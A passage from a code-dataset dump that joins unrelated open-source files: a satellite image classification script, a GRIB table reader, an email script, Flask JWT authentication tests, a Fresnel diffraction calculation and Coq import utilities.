# raise Exception
except:
#self.errorMsg(e)
#qgis.core.QgsMessageLog.logMessage(str('Exception: {}'.format(e)))
print str('Exception: {}'.format(e))
#qgis.core.QgsMessageLog.logMessage(str('Exception occurred...deleting temporary files'))
print str('Exception occurred...deleting temporary files')
ut.delete_tmps(self.ls_path)
else:
            #qgis.core.QgsMessageLog.logMessage(str('Processing successfully completed'))
            #qgis.core.QgsMessageLog.logMessage(str('Deleting temporary files'))
            print str('Processing successfully completed')
print str('Deleting temporary files')
#self.iface.messageBar().pushMessage('Processing successfully completed, see log for details',self.iface.messageBar().SUCCESS,duration=3)
print 'Processing successfully completed, see log for details'
ut.delete_tmps(self.ls_path)
def run_classification(self):
"""Run method that performs all the real work"""
import utils
import traceback
#import qgis.core
import ogr
import os
import subprocess
#Get user edits
valid_input=self.updateCForm()
#TODO:fix
self.classification_type='libsvm'
self.svmModel = self.in_train[:-4]+'_svmModel.svm'
self.ConfMatrix = self.in_train[:-4]+'_CM.csv'
try:
import otbApplication
except:
print 'ERROR: Plugin requires installation of OrfeoToolbox'
e = 'Unspecified error'
try:
#instantiate utilities functions
ut = utils.utils()
#FIX:overwrite utils function train
print "FIX:overwriting utils function otb_train_cls due to bug in otb"
#def new_train_classifier(raster, train, stats, classification_type, label, svmModel, ConfMatrix):
# cmd = "~/OTB-5.10.1-Linux64/bin/otbcli_TrainImagesClassifier -io.il {} -io.vd {} -io.imstat {} -sample.mv 100 -sample.vfn {} -classifier {} -classifier.libsvm.k linear -classifier.libsvm.c 1 -classifier.libsvm.opt false -io.out {} -io.confmatout {}".format(raster,train,stats,label,classification_type,svmModel,ConfMatrix)
# os.system(cmd)
# return "success"
#ut.otb_train_classifier=new_train_classifier
try:
#check if input is not empty string
1/valid_input
except ZeroDivisionError:
e = str('Please fill all required input fields')
raise Exception
#check if training fields overlap with raster
if not self.external:
try:
error,overlap = ut.vector_raster_overlap(self.in_train,self.raster)
except:
e = str('Unspecified error while trying to execute utils.vector_raster_overlap function')
raise Exception
if error!='SUCCESS':
e = error
raise Exception
else:
try:
1/overlap
except ZeroDivisionError:
e = str('At least one feature in {} does not overlap with {}'.format(self.in_train,self.raster))
raise Exception
#generate image statistics
try:
self.stats = str(self.raster[:-4]+'_stats.xml')
error=ut.otb_image_statistics(str(self.raster),str(self.stats))
if error!='success':raise ZeroDivisionError
#qgis.core.QgsMessageLog.logMessage(str('Calculated image statistics {} for {}'.format(self.stats,self.raster)))
print str('Calculated image statistics {} for {}'.format(self.stats,self.raster))
except ZeroDivisionError:
e = str('Could not execute OTB Image Statistics on: {}. \nError is:{}'.format(self.raster,error))
raise Exception
            # differentiate two cases: 1) external SVM provided and 2) on-the-fly SVM training
if self.external:
if self.in_train!='':
#use full training set for testing
self.test = self.in_train
#get SVM filename
self.svmModel = self.Cdlg.lineEdit_4.text()
else:
#split training dataset in 80% train 20% testing
[self.error,self.test,self.train] = ut.split_train(self.in_train,self.label,self.startupinfo)
if self.error != 'success':
e=self.error
raise Exception
else:
#qgis.core.QgsMessageLog.logMessage(str('Splitted ground truth data set in {} (~80%) and {} (~20%)'.format(self.train,self.test)))
print str('Splitted ground truth data set in {} (~80%) and {} (~20%)'.format(self.train,self.test))
#train classifier
#on the fly (wrong) confusion matrix gets overwritten later
try:
error=ut.otb_train_classifier(self.raster, self.train, self.stats, self.classification_type, self.label, self.svmModel, self.ConfMatrix)
if error!='success': raise ZeroDivisionError
#qgis.core.QgsMessageLog.logMessage(str('Trained image classifier using {} and {}'.format(self.raster,self.train)))
print str('Trained image classifier using {} and {}'.format(self.raster,self.train))
except ZeroDivisionError:
e = 'Could not execute OTB TrainClassifiers with {} {} {} {} {} {} {}. \nError is:{}'.format(self.raster, self.train, self.stats, self.classification_type, self.label, self.svmModel, self.ConfMatrix,error)
raise Exception
#classify image
try:
error=ut.otb_classification(self.raster, self.stats, self.svmModel, self.out_fname)
if error!='success': raise ZeroDivisionError
print str('Image {} classified as {}'.format(self.raster,self.out_fname))
except ZeroDivisionError:
e = 'Could not execute OTB Classifier with {}, {}, {}, {}. \n Error is: {}'.format(self.raster, self.stats, self.svmModel, self.out_fname,error)
raise Exception
#confusion matrix
try:
#testing is optional in case of externally provided SVM
if self.in_train!='':
print self.out_fname,self.ConfMatrix,self.test,self.label
error=ut.otb_confusion_matrix(self.out_fname,self.ConfMatrix,self.test,self.label)
if error!='success':raise ZeroDivisionError
print str('Confusion matrix calculated on classified image {} with test set {} saved as {}'.format(self.out_fname,self.test,self.ConfMatrix))
except ZeroDivisionError:
e = 'Could not execute OTB Confusion Matrix with {}, {}, {}, {}. \nError is: {}'.format(self.out_fname, self.ConfMatrix, self.test, self.label)
raise Exception
#if sieving is asked perform sieving
#if self.Cdlg.checkBox_3.isChecked():
if (self.config['sieve']!=''):
try:
if os.name=='nt':
cmd = ['gdal_sieve.bat','-q','-st',str(self.sieve),'-8',str(self.out_fname)]
else:
cmd = ['gdal_sieve.py','-q','-st',str(self.sieve),'-8',str(self.out_fname)]
subprocess.check_call(cmd,startupinfo=self.startupinfo)
except subprocess.CalledProcessError:
e = 'Could not execute {}'.format(cmd)
raise Exception
#add to map canvas if checked
#if self.Cdlg.checkBox_2.isChecked():
# try:
# self.iface.addRasterLayer(str(self.out_fname), "SatEx_classified_scene")
# except:
# e = str('Could not add {} to the layer canvas'.format(self.out_fname))
# raise Exception
except:
#self.errorMsg(e)
#qgis.core.QgsMessageLog.logMessage(e)
print e
else:
print str('Processing completed')
print 'Processing successfully completed, see log for details'
def main():
import ConfigParser
#read config
Config = ConfigParser.ConfigParser()
Config.read("config.ini")
#store as dictionary
config = {}
#preprocessing
parameters = ['ls_path','roi','out_fname']
for par in parameters:
try:
config[par] = Config.get("preprocessing",par)
except:
config[par] = ''
#save before overriden
config['out_fname1']= config['out_fname']
#classification
parameters = ['raster','in_train','out_fname','label','sieve','external']
for par in parameters:
try:
config[par] = Config.get("classification",par)
except:
config[par] = ''
#satex instance
satex = SatEx(config)
#workflow
if (config['ls_path']!=''):
satex.run_preprocessing()
else:
print 'No valid preprocessing configuration found. Skipping..'
if (config['raster']!=''):
satex.run_classification()
else:
print 'No valid classification configuration found. Skipping..'
if __name__ == "__main__":
main()
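# Minimal config.ini sketch (assumed values) matching the sections and keys read
# in main() above:
#
# [preprocessing]
# ls_path = /data/landsat/scenes
# roi = /data/roi/area_of_interest.shp
# out_fname = /data/output/mosaic.vrt
#
# [classification]
# raster = /data/output/mosaic.vrt
# in_train = /data/training/ground_truth.shp
# out_fname = /data/output/classified.tif
# label = class
# sieve = 8
# external =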
| bsd-3-clause | -9,089,529,124,461,430,000 | 41.912833 | 332 | 0.574903 | false | 4.02887 | true | false | false |
ARPA-SIMC/arkimet | python/arkimet/formatter/eccodes.py | 1 | 3601 | import os
import re
def get_eccodes_def_dir() -> str:
"""
get the list of directories (separated by :) where grib_api/eccodes keep their definitions
"""
path = os.environ.get("ECCODES_DEFINITION_PATH", None)
if path is not None:
return path.split(":")
path = os.environ.get("GRIBAPI_DEFINITION_PATH", None)
if path is not None:
return path.split(":")
return ["/usr/share/eccodes/definitions/"]
class GribTable:
"""
Read a grib table.
edition is the GRIB edition: 1 or 2
table is the table name, for example "0.0"
    The resulting object maps each index to a pair (abbreviation, description);
    indices missing from the file are simply absent.
    For convenience, the class also provides two methods, 'abbr' and 'desc', that
    return the abbreviation or the description, falling back on returning the table
    index if it is not available.
    For example:
      origins = GribTable(1, "0")
      print(origins.abbr(98))   # Prints 'ecmf'
      print(origins.desc(98))   # Prints 'European Center for Medium-Range Weather Forecasts'
      print(origins.abbr(999))  # Prints '999'
      print(origins.desc(999))  # Prints '999'
"""
cache = {}
re_table_line = re.compile(r"^\s*(?P<idx>\d+)\s+(?P<abbr>\S+)\s+(?P<desc>.+)$")
def __init__(self, edition: int, table: str):
self.edition = edition
self.table = table
self._abbr = {}
self._desc = {}
for path in get_eccodes_def_dir():
# Build the file name
fname = os.path.join(path, "grib" + str(edition), str(table)) + ".table"
try:
with open(fname, "rt") as fd:
for line in fd:
mo = self.re_table_line.match(line)
if not mo:
continue
idx = int(mo.group("idx"))
self._abbr[idx] = mo.group("abbr")
self._desc[idx] = mo.group("desc").strip()
except FileNotFoundError:
pass
def set(self, code: int, abbr: str, desc: str):
"""
Add/replace a value in the table
"""
self._abbr[code] = abbr
self._desc[code] = desc
def has(self, val: int) -> bool:
return val in self._abbr
def abbr(self, val: int) -> str:
"""
Get an abbreviated description
"""
res = self._abbr.get(val)
if res is None:
return str(val)
else:
return res
def desc(self, val: int) -> str:
"""
Get a long description
"""
res = self._desc.get(val)
if res is None:
return str(val)
else:
return res
@classmethod
def load(cls, edition: int, table: str) -> "GribTable":
key = (edition, table)
res = cls.cache.get(key)
if res is None:
res = cls(edition, table)
cls.cache[key] = res
return res
@classmethod
def get_grib2_table_prefix(cls, centre, table_version, local_table_version):
default_table_version = 4
if table_version is None or table_version == 255:
table_version = default_table_version
if local_table_version is not None and local_table_version not in (0, 255):
centres = cls.load(1, "0")
if centres.has(centre):
return os.path.join('tables', 'local', centres.abbr(centre), str(local_table_version))
return os.path.join('tables', str(table_version))
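# Example (sketch): with the default tables, GribTable.get_grib2_table_prefix(98, 255, 0)
# falls back to table version 4 and returns os.path.join('tables', '4').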
| gpl-2.0 | -5,546,674,192,884,967,000 | 29.008333 | 102 | 0.546515 | false | 3.743243 | false | false | false |
rboman/progs | apps/mails/mimetest.py | 1 | 1080 | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2017 Romain Boman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import smtplib
from email.mime.text import MIMEText
file = open("CYGWIN-diffs.html",'r')
text = file.read()
file.close()
toA = "[email protected]"
fromA = "[email protected]"
mail = MIMEText(text)
mail['From'] = fromA
mail['Subject'] = "Sujet du message"
mail['To'] = toA
mail['Content-Type'] = "text/html"
smtp = smtplib.SMTP("smtp.ulg.ac.be")
smtp.set_debuglevel(1)
smtp.sendmail(fromA, [toA], mail.as_string())
smtp.close()
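# Sketch of the flow: read a local HTML diff report, wrap it in a MIMEText
# message flagged as text/html, and hand it to the configured SMTP relay.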
| apache-2.0 | -2,451,455,311,142,843,400 | 28.216216 | 76 | 0.703704 | false | 3.148688 | false | false | false |
atlassian/asap-authentication-python | atlassian_jwt_auth/frameworks/flask/tests/test_flask.py | 1 | 5032 | import unittest
from flask import Flask
from atlassian_jwt_auth.contrib.flask_app import requires_asap
from atlassian_jwt_auth.contrib.tests.utils import get_static_retriever_class
from atlassian_jwt_auth.frameworks.flask import with_asap
from atlassian_jwt_auth.tests import utils
from atlassian_jwt_auth.tests.utils import (
create_token,
)
def get_app():
app = Flask(__name__)
app.config.update({
'ASAP_VALID_AUDIENCE': 'server-app',
'ASAP_VALID_ISSUERS': ('client-app',),
'ASAP_PUBLICKEY_REPOSITORY': None
})
@app.route("/")
@requires_asap
def view():
return "OK"
@app.route("/restricted-to-another-client/")
@with_asap(issuers=['another-client'])
def view_for_another_client_app():
return "OK"
return app
class FlaskTests(utils.RS256KeyTestMixin, unittest.TestCase):
""" tests for the atlassian_jwt_auth.contrib.tests.flask """
def setUp(self):
self._private_key_pem = self.get_new_private_key_in_pem_format()
self._public_key_pem = utils.get_public_key_pem_for_private_key_pem(
self._private_key_pem
)
self.app = get_app()
self.client = self.app.test_client()
retriever = get_static_retriever_class({
'client-app/key01': self._public_key_pem
})
self.app.config['ASAP_KEY_RETRIEVER_CLASS'] = retriever
def send_request(self, token, url='/'):
""" returns the response of sending a request containing the given
token sent in the Authorization header.
"""
return self.client.get(url, headers={
'Authorization': b'Bearer ' + token
})
def test_request_with_valid_token_is_allowed(self):
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 200)
def test_request_with_duplicate_jti_is_rejected_as_per_setting(self):
self.app.config['ASAP_CHECK_JTI_UNIQUENESS'] = True
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 200)
self.assertEqual(self.send_request(token).status_code, 401)
def _assert_request_with_duplicate_jti_is_accepted(self):
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 200)
self.assertEqual(self.send_request(token).status_code, 200)
def test_request_with_duplicate_jti_is_accepted(self):
self._assert_request_with_duplicate_jti_is_accepted()
def test_request_with_duplicate_jti_is_accepted_as_per_setting(self):
self.app.config['ASAP_CHECK_JTI_UNIQUENESS'] = False
self._assert_request_with_duplicate_jti_is_accepted()
def test_request_with_invalid_audience_is_rejected(self):
token = create_token(
'client-app', 'invalid-audience',
'client-app/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 401)
def test_request_with_invalid_token_is_rejected(self):
response = self.send_request(b'notavalidtoken')
self.assertEqual(response.status_code, 401)
def test_request_with_invalid_issuer_is_rejected(self):
# Try with a different audience with a valid signature
self.app.config['ASAP_KEY_RETRIEVER_CLASS'] = (
get_static_retriever_class({
'another-client/key01': self._public_key_pem
})
)
token = create_token(
'another-client', 'server-app',
'another-client/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 403)
def test_decorated_request_with_invalid_issuer_is_rejected(self):
# Try with a different audience with a valid signature
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem
)
url = '/restricted-to-another-client/'
self.assertEqual(self.send_request(token, url=url).status_code, 403)
def test_request_subject_and_issue_not_matching(self):
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem,
subject='different'
)
self.assertEqual(self.send_request(token).status_code, 401)
def test_request_subject_does_not_need_to_match_issuer_from_settings(self):
self.app.config['ASAP_SUBJECT_SHOULD_MATCH_ISSUER'] = False
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem,
subject='different'
)
self.assertEqual(self.send_request(token).status_code, 200)
| mit | -3,690,334,047,130,404,000 | 35.201439 | 79 | 0.627385 | false | 3.511514 | true | false | false |
srio/Diffraction | fresnel_kirchhoff_1D.py | 1 | 2886 | """
fresnel:
functions:
goFromTo: calculates the phase shift matrix
"""
__author__ = "Manuel Sanchez del Rio"
__contact__ = "[email protected]"
__copyright = "ESRF, 2012"
import numpy, math
def goFromTo(source,image,distance=1.0,lensF=None,wavelength=1e-10):
distance = numpy.array(distance)
x1 = numpy.outer(source,numpy.ones(image.size))
x2 = numpy.outer(numpy.ones(source.size),image)
r = numpy.sqrt( numpy.power(x1-x2,2) + numpy.power(distance,2) )
# add lens at the image plane
    if lensF is not None:
r = r - numpy.power(x1-x2,2)/lensF
wavenumber = numpy.pi*2/wavelength
return numpy.exp(1.j * wavenumber * r)
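# Illustrative note (added commentary, not from the original source): goFromTo
# builds the Fresnel-Kirchhoff kernel K(x1, x2) = exp(1j * 2*pi/wavelength * r)
# with r = sqrt((x1 - x2)**2 + distance**2), optionally corrected by a thin-lens
# term (x1 - x2)**2 / lensF. A minimal usage sketch with assumed values:
#
#   src = numpy.linspace(-5e-6, 5e-6, 100)   # source plane coordinates [m]
#   det = numpy.linspace(-4e-4, 4e-4, 200)   # detector plane coordinates [m]
#   kernel = goFromTo(src, det, distance=1.0, wavelength=1e-10)
#   amplitude = numpy.dot(numpy.ones(src.size), kernel)  # plane-wave illumination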
if __name__ == '__main__':
# wavelength = 1e-10
# aperture_diameter = 10e-6
# detector_size = 0.8e-3
# #wavelength = 500e-9
# #aperture_diameter = 1e-3
# #detector_size = 4e-3
#
# sourcepoints = 1000
# detpoints = 1000
# distance = 1.00
# lensF = None
# wavelength = 5000e-10
# sourcesize = 500e-6
# detector_size = 0.008
#wavelength = 500e-9
#aperture_diameter = 1e-3
#detector_size = 4e-3
wavelength = 1.24e-10 # 10keV
aperture_diameter = 40e-6 # 1e-3 # 1e-6
detector_size = 800e-6
distance = 3.6
sourcepoints = 1000
detpoints = 1000
lensF = None
sourcesize = aperture_diameter
position1x = numpy.linspace(-sourcesize/2,sourcesize/2,sourcepoints)
position2x = numpy.linspace(-detector_size/2,detector_size/2,detpoints)
fields12 = goFromTo(position1x,position2x,distance, \
lensF=lensF,wavelength=wavelength)
print ("Shape of fields12: ",fields12.shape)
#prepare results
fieldComplexAmplitude = numpy.dot(numpy.ones(sourcepoints),fields12)
print ("Shape of Complex U: ",fieldComplexAmplitude.shape)
print ("Shape of position1x: ",position1x.shape)
fieldIntensity = numpy.power(numpy.abs(fieldComplexAmplitude),2)
    fieldPhase = numpy.arctan2(numpy.imag(fieldComplexAmplitude), \
                               numpy.real(fieldComplexAmplitude))  # phase = atan2(Im, Re)
#
# write spec formatted file
#
out_file = "fresnel_kirchhoff_1D.spec"
f = open(out_file, 'w')
header="#F %s \n\n#S 1 fresnel-kirchhoff diffraction integral\n#N 3 \n#L X[m] intensity phase\n"%out_file
f.write(header)
for i in range(detpoints):
out = numpy.array((position2x[i], fieldIntensity[i], fieldPhase[i]))
f.write( ("%20.11e "*out.size+"\n") % tuple( out.tolist()) )
f.close()
print ("File written to disk: %s"%out_file)
#
#plots
#
from matplotlib import pylab as plt
plt.figure(1)
plt.plot(position2x*1e6,fieldIntensity)
plt.title("Fresnel-Kirchhoff Diffraction")
plt.xlabel("X [um]")
plt.ylabel("Intensity [a.u.]")
plt.show() | gpl-2.0 | -2,424,140,715,528,884,700 | 27.029126 | 112 | 0.618157 | false | 2.978328 | false | false | false |
JasonGross/coq-tools | import_util.py | 1 | 28530 | from __future__ import with_statement, print_function
import os, subprocess, re, sys, glob, os.path, tempfile, time
from functools import cmp_to_key
from memoize import memoize
from coq_version import get_coqc_help, get_coq_accepts_o, group_coq_args_split_recognized, coq_makefile_supports_arg
from custom_arguments import DEFAULT_VERBOSITY, DEFAULT_LOG
from util import cmp_compat as cmp
import util
__all__ = ["filename_of_lib", "lib_of_filename", "get_file_as_bytes", "get_file", "make_globs", "get_imports", "norm_libname", "recursively_get_imports", "IMPORT_ABSOLUTIZE_TUPLE", "ALL_ABSOLUTIZE_TUPLE", "absolutize_has_all_constants", "run_recursively_get_imports", "clear_libimport_cache", "get_byte_references_for", "sort_files_by_dependency", "get_recursive_requires", "get_recursive_require_names"]
file_mtimes = {}
file_contents = {}
lib_imports_fast = {}
lib_imports_slow = {}
DEFAULT_LIBNAMES=(('.', 'Top'), )
IMPORT_ABSOLUTIZE_TUPLE = ('lib', )# 'mod')
ALL_ABSOLUTIZE_TUPLE = ('lib', 'proj', 'rec', 'ind', 'constr', 'def', 'syndef', 'class', 'thm', 'lem', 'prf', 'ax', 'inst', 'prfax', 'coind', 'scheme', 'vardef')# , 'mod', 'modtype')
IMPORT_REG = re.compile('^R([0-9]+):([0-9]+) ([^ ]+) <> <> lib$', re.MULTILINE)
IMPORT_LINE_REG = re.compile(r'^\s*(?:Require\s+Import|Require\s+Export|Require|Load\s+Verbose|Load)\s+(.*?)\.(?:\s|$)', re.MULTILINE | re.DOTALL)
def warning(*objs):
print("WARNING: ", *objs, file=sys.stderr)
def error(*objs):
print("ERROR: ", *objs, file=sys.stderr)
def fill_kwargs(kwargs):
rtn = {
'libnames' : DEFAULT_LIBNAMES,
'non_recursive_libnames': tuple(),
'ocaml_dirnames' : tuple(),
'verbose' : DEFAULT_VERBOSITY,
'log' : DEFAULT_LOG,
'coqc' : 'coqc',
'coq_makefile' : 'coq_makefile',
'walk_tree' : True,
'coqc_args' : tuple(),
'inline_coqlib' : None,
}
rtn.update(kwargs)
return rtn
def safe_kwargs(kwargs):
for k, v in list(kwargs.items()):
if isinstance(v, list):
kwargs[k] = tuple(v)
return dict((k, v) for k, v in kwargs.items() if not isinstance(v, dict))
def fix_path(filename):
return filename.replace('\\', '/')
def absolutize_has_all_constants(absolutize_tuple):
'''Returns True if absolutizing the types of things mentioned by the tuple is enough to ensure that we only use absolute names'''
return set(ALL_ABSOLUTIZE_TUPLE).issubset(set(absolutize_tuple))
def libname_with_dot(logical_name):
if logical_name in ("", '""', "''"):
return ""
else:
return logical_name + "."
def clear_libimport_cache(libname):
if libname in lib_imports_fast.keys():
del lib_imports_fast[libname]
if libname in lib_imports_slow.keys():
del lib_imports_slow[libname]
@memoize
def os_walk(top, topdown=True, onerror=None, followlinks=False):
return tuple(os.walk(top, topdown=topdown, onerror=onerror, followlinks=followlinks))
@memoize
def os_path_isfile(filename):
return os.path.isfile(filename)
def filenames_of_lib_helper(lib, libnames, non_recursive_libnames, ext):
for physical_name, logical_name in list(libnames) + list(non_recursive_libnames):
if lib.startswith(libname_with_dot(logical_name)):
cur_lib = lib[len(libname_with_dot(logical_name)):]
cur_lib = os.path.join(physical_name, cur_lib.replace('.', os.sep))
yield fix_path(os.path.relpath(os.path.normpath(cur_lib + ext), '.'))
def local_filenames_of_lib_helper(lib, libnames, non_recursive_libnames, ext):
# is this the right thing to do?
lib = lib.replace('.', os.sep)
for dirpath, dirname, filenames in os_walk('.', followlinks=True):
filename = os.path.relpath(os.path.normpath(os.path.join(dirpath, lib + ext)), '.')
if os_path_isfile(filename):
yield fix_path(filename)
@memoize
def filename_of_lib_helper(lib, libnames, non_recursive_libnames, ext):
filenames = list(filenames_of_lib_helper(lib, libnames, non_recursive_libnames, ext))
local_filenames = list(local_filenames_of_lib_helper(lib, libnames, non_recursive_libnames, ext))
existing_filenames = [f for f in filenames if os_path_isfile(f) or os_path_isfile(os.path.splitext(f)[0] + '.v')]
if len(existing_filenames) > 0:
retval = existing_filenames[0]
if len(existing_filenames) == 1:
return retval
else:
DEFAULT_LOG('WARNING: Multiple physical paths match logical path %s: %s. Selecting %s.'
% (lib, ', '.join(existing_filenames), retval))
return retval
if len(filenames) != 0:
DEFAULT_LOG('WARNING: One or more physical paths match logical path %s, but none of them exist: %s'
% (lib, ', '.join(filenames)))
if len(local_filenames) > 0:
retval = local_filenames[0]
if len(local_filenames) == 1:
return retval
else:
DEFAULT_LOG('WARNING: Multiple local physical paths match logical path %s: %s. Selecting %s.'
% (lib, ', '.join(local_filenames), retval))
return retval
if len(filenames) > 0:
retval = filenames[0]
if len(filenames) == 1:
return retval
else:
DEFAULT_LOG('WARNING: Multiple non-existent physical paths match logical path %s: %s. Selecting %s.'
% (lib, ', '.join(filenames), retval))
return retval
return fix_path(os.path.relpath(os.path.normpath(lib.replace('.', os.sep) + ext), '.'))
def filename_of_lib(lib, ext='.v', **kwargs):
kwargs = fill_kwargs(kwargs)
return filename_of_lib_helper(lib, libnames=tuple(kwargs['libnames']), non_recursive_libnames=tuple(kwargs['non_recursive_libnames']), ext=ext)
@memoize
def lib_of_filename_helper(filename, libnames, non_recursive_libnames, exts):
filename = os.path.relpath(os.path.normpath(filename), '.')
for ext in exts:
if filename.endswith(ext):
filename = filename[:-len(ext)]
break
for physical_name, logical_name in ((os.path.relpath(os.path.normpath(phys), '.'), libname_with_dot(logical)) for phys, logical in list(libnames) + list(non_recursive_libnames)):
filename_rel = os.path.relpath(filename, physical_name)
if not filename_rel.startswith('..' + os.sep) and not os.path.isabs(filename_rel):
return (filename, logical_name + filename_rel.replace(os.sep, '.'))
if filename.startswith('..' + os.sep) and not os.path.isabs(filename):
filename = os.path.abspath(filename)
return (filename, filename.replace(os.sep, '.'))
def lib_of_filename(filename, exts=('.v', '.glob'), **kwargs):
kwargs = fill_kwargs(kwargs)
filename, libname = lib_of_filename_helper(filename, libnames=tuple(kwargs['libnames']), non_recursive_libnames=tuple(kwargs['non_recursive_libnames']), exts=exts)
# if '.' in filename and kwargs['verbose']:
# # TODO: Do we still need this warning?
# kwargs['log']("WARNING: There is a dot (.) in filename %s; the library conversion probably won't work." % filename)
return libname
def is_local_import(libname, **kwargs):
'''Returns True if libname is an import to a local file that we can discover and include, and False otherwise'''
return os.path.isfile(filename_of_lib(libname, **kwargs))
def get_raw_file_as_bytes(filename, **kwargs):
kwargs = fill_kwargs(kwargs)
if kwargs['verbose']:
filename_extra = '' if os.path.isabs(filename) else ' (%s)' % os.path.abspath(filename)
kwargs['log']('getting %s%s' % (filename, filename_extra))
with open(filename, 'rb') as f:
return f.read()
def get_raw_file(*args, **kwargs):
return util.normalize_newlines(get_raw_file_as_bytes(*args, **kwargs).decode('utf-8'))
# code is string
@memoize
def get_constr_name(code):
first_word = code.split(' ')[0]
last_component = first_word.split('.')[-1]
return last_component
# before, after are both strings
def move_strings_once(before, after, possibility, relaxed=False):
for i in possibility:
if before[-len(i):] == i:
return before[:-len(i)], before[-len(i):] + after
if relaxed: # allow no matches
return before, after
else:
return None, None
# before, after are both strings
def move_strings_pre(before, after, possibility):
while len(before) > 0:
new_before, new_after = move_strings_once(before, after, possibility)
if new_before is None or new_after is None:
return before, after
before, after = new_before, new_after
return (before, after)
# before, after are both strings
def move_function(before, after, get_len):
while len(before) > 0:
n = get_len(before)
if n is None or n <= 0:
return before, after
before, after = before[:-n], before[n:] + after
return before, after
# before, after are both strings
def move_strings(before, after, *possibilities):
for possibility in possibilities:
before, after = move_strings_pre(before, after, possibility)
return before, after
# before, after are both strings
def move_space(before, after):
return move_strings(before, after, '\n\t\r ')
# uses byte locations
def remove_from_require_before(contents, location):
"""removes "From ... " from things like "From ... Require ..." """
assert(contents is bytes(contents))
before, after = contents[:location].decode('utf-8'), contents[location:].decode('utf-8')
before, after = move_space(before, after)
before, after = move_strings_once(before, after, ('Import', 'Export'), relaxed=True)
before, after = move_space(before, after)
before, after = move_strings_once(before, after, ('Require',), relaxed=False)
if before is None or after is None: return contents
before, _ = move_space(before, after)
before, _ = move_function(before, after, (lambda b: 1 if b[-1] not in ' \t\r\n' else None))
if before is None: return contents
before, _ = move_space(before, after)
before, _ = move_strings_once(before, after, ('From',), relaxed=False)
if before is None: return contents
return (before + after).encode('utf-8')
# returns locations as bytes
def get_references_from_globs(globs):
all_globs = set((int(start), int(end) + 1, loc, append, ty.strip())
for start, end, loc, append, ty
in re.findall('^R([0-9]+):([0-9]+) ([^ ]+) <> ([^ ]+) ([^ ]+)$', globs, flags=re.MULTILINE))
return tuple(sorted(all_globs, key=(lambda x: x[0]), reverse=True))
# contents should be bytes; globs should be string
def update_with_glob(contents, globs, absolutize, libname, transform_base=(lambda x: x), **kwargs):
assert(contents is bytes(contents))
kwargs = fill_kwargs(kwargs)
for start, end, loc, append, ty in get_references_from_globs(globs):
cur_code = contents[start:end].decode('utf-8')
if ty not in absolutize or loc == libname:
if kwargs['verbose'] >= 2: kwargs['log']('Skipping %s at %d:%d (%s), location %s %s' % (ty, start, end, cur_code, loc, append))
# sanity check for correct replacement, to skip things like record builder notation
elif append != '<>' and get_constr_name(cur_code) != append:
if kwargs['verbose'] >= 2: kwargs['log']('Skipping invalid %s at %d:%d (%s), location %s %s' % (ty, start, end, cur_code, loc, append))
else: # ty in absolutize and loc != libname
rep = transform_base(loc) + ('.' + append if append != '<>' else '')
if kwargs['verbose'] == 2: kwargs['log']('Qualifying %s %s to %s' % (ty, cur_code, rep))
if kwargs['verbose'] > 2: kwargs['log']('Qualifying %s %s to %s from R%s:%s %s <> %s %s' % (ty, cur_code, rep, start, end, loc, append, ty))
contents = contents[:start] + rep.encode('utf-8') + contents[end:]
contents = remove_from_require_before(contents, start)
return contents
def get_all_v_files(directory, exclude=tuple()):
all_files = []
exclude = [os.path.normpath(i) for i in exclude]
for dirpath, dirnames, filenames in os.walk(directory):
all_files += [os.path.relpath(name, '.') for name in glob.glob(os.path.join(dirpath, '*.v'))
if os.path.normpath(name) not in exclude]
return tuple(map(fix_path, all_files))
# we want to run on passing arguments if we're running in
# passing/non-passing mode, cf
# https://github.com/JasonGross/coq-tools/issues/57. Hence we return
# the passing version iff passing_coqc is passed
def get_maybe_passing_arg(kwargs, key):
if kwargs.get('passing_coqc'): return kwargs['passing_' + key]
return kwargs[key]
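# Hedged usage sketch (the 'passing_*' keys are assumed to be supplied by the
# caller, since fill_kwargs itself does not define them): with
#   kwargs = {'passing_coqc': 'coqc-8.9', 'passing_coqc_args': ('-q',), 'coqc_args': ()}
# get_maybe_passing_arg(kwargs, 'coqc_args') returns ('-q',); when
# 'passing_coqc' is unset or empty it falls back to kwargs['coqc_args'].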
def run_coq_makefile_and_make(v_files, targets, **kwargs):
kwargs = safe_kwargs(fill_kwargs(kwargs))
f = tempfile.NamedTemporaryFile(suffix='.coq', prefix='Makefile', dir='.', delete=False)
mkfile = os.path.basename(f.name)
f.close()
cmds = [kwargs['coq_makefile'], 'COQC', '=', get_maybe_passing_arg(kwargs, 'coqc'), '-o', mkfile]
for physical_name, logical_name in get_maybe_passing_arg(kwargs, 'libnames'):
cmds += ['-R', physical_name, (logical_name if logical_name not in ("", "''", '""') else '""')]
for physical_name, logical_name in get_maybe_passing_arg(kwargs, 'non_recursive_libnames'):
cmds += ['-Q', physical_name, (logical_name if logical_name not in ("", "''", '""') else '""')]
for dirname in get_maybe_passing_arg(kwargs, 'ocaml_dirnames'):
cmds += ['-I', dirname]
coq_makefile_help = get_coqc_help(kwargs['coq_makefile'], **kwargs)
grouped_args, unrecognized_args = group_coq_args_split_recognized(get_maybe_passing_arg(kwargs, 'coqc_args'), coq_makefile_help, is_coq_makefile=True)
for args in grouped_args:
cmds.extend(args)
if unrecognized_args:
if coq_makefile_supports_arg(coq_makefile_help):
for arg in unrecognized_args:
cmds += ['-arg', arg]
else:
if kwargs['verbose']: kwargs['log']('WARNING: Unrecognized arguments to coq_makefile: %s' % repr(unrecognized_args))
cmds += list(map(fix_path, v_files))
if kwargs['verbose']:
